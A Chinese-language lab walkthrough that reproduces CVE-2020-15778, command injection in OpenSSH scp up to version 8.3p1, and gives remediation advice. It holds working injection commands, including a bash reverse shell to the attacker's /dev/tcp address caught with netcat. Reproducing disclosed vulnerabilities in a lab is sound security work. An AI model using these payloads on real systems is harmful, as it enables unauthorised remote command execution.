OpenSSH 命令注入漏洞(CVE-2020-15778)复现

1 简介

OpenSSH是SSH（Secure SHell）协议的免费开源实现。OpenSSH是个SSH的软件，linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。

2 漏洞概述

该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令，攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。

漏洞等级：高危，漏洞评分：7.8。

3 影响范围

• openssh <= openssh-8.3p1

4 环境搭建

4.1 靶机：CentOs7，ip：192.168.10.173

4.2 渗透机：Kali 2020，ip：192.168.10.132

4.3 CentOs7中在root权限下安装iptables

• yum install -y iptables

4.4 继续安装iptables-sercices

• yum install iptables-services

 

4.5 在CentOs7中设置策略，禁止ssh登录，保留scp

• iptables  -F
• services iptables start
• iptables  -t filter  -AINPUT  -p tcp --dport 22  -m tos  --tos 0x10  -j DROP
• service iptables save
• Iptables  -L  -n  --line-number

 

4.6 在Kali机以root权限测试ssh与scp在已设置iptables策略下的使用情况,此时证明scp功能正常使用，ssh连接centos失败，证明iptables策略(禁用ssh登录，只保留scp)成功有效

• echo “123456” >tqt.txt
• scp tqt.txt [email protected]:/tmp/h.txt
• ssh @root192.168.10.173

 

5 漏洞复现

5.1 查看CentOs7的ssh版本

• ssh  -V

 

5.2 尝试利用scp命令，用kali对CentOs7进行写文件，复制文件,成功将Kali上的文件传入CentOs7中

• scp tqt.txt [email protected]:’`touch /tmp/test.txt` /tmp

 

5.3 在Kali上监听8452端口

• nc  -lvp 8452

 

5.4 进行反弹shell

• scp test.txt [email protected]:’`bash 

         -i >&/dev/tcp/192.168.10.132/8452 0>&1`/tmp/test1.txt’

5.5 在Kali机的监听界面执行任意系统命令，例如ifconfig可查到CentOs7上的ip地址；输入pwd可以查看CentOs7当前工作目录的绝对路径

• ifconfig
• pwd

 

 

6 修复建议

6.1 检测方法输入ssh -v命令查看openssh版本如显示的版本号<= 8.3p1，则漏洞存在。

6.2 加强ssh密码或者密钥的保护，周期性更换密码或密钥，或者使用rsync代替scp。

6.3 升级补丁。

 

参考文章:https://www.freebuf.com/vuls/260340.html